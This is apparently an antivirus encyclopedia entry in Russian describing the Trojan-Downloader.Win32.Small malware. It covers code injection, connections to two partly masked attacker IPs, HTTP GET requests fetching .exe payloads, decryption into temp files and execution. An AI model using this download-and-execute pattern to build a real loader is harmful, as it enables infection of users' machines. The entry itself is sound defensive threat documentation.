Trojan-Downloader.Win32.Small

Дата обнаружения 22/03/2011
Класс Trojan-Downloader
Платформа Win32
Описание

После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как «Trojan-Downloader.Win32.Agent.cngp»). Внедренный код выполняет следующие действия:

  • устанавливает соединение с хостами:
    
    
    
    188.***.161
    
    
    
    85.***.111
    
    
    
    
  • В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:
    
    
    
    GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
    
    
    
    Host: 188.***.161
    
    
    
    
    
    
    
    GET /bat.exe HTTP/1.0
    
    
    
    Host: 188.***.161
    
    
    
    
    
    
    
    GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
    
    
    
    Host: 85.***.111
    
    
    
    
    
    
    
    GET /bat.exe HTTP/1.0
    
    
    
    Host: 85.***.111
    
    
    
    
  • В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:
    %WinDir%Temp_ex-.exe

    где – случайные двухзначные десятичные числа.

    На момент создания описания файлы не загружались.

  • Запускает на выполнение загруженные файлы.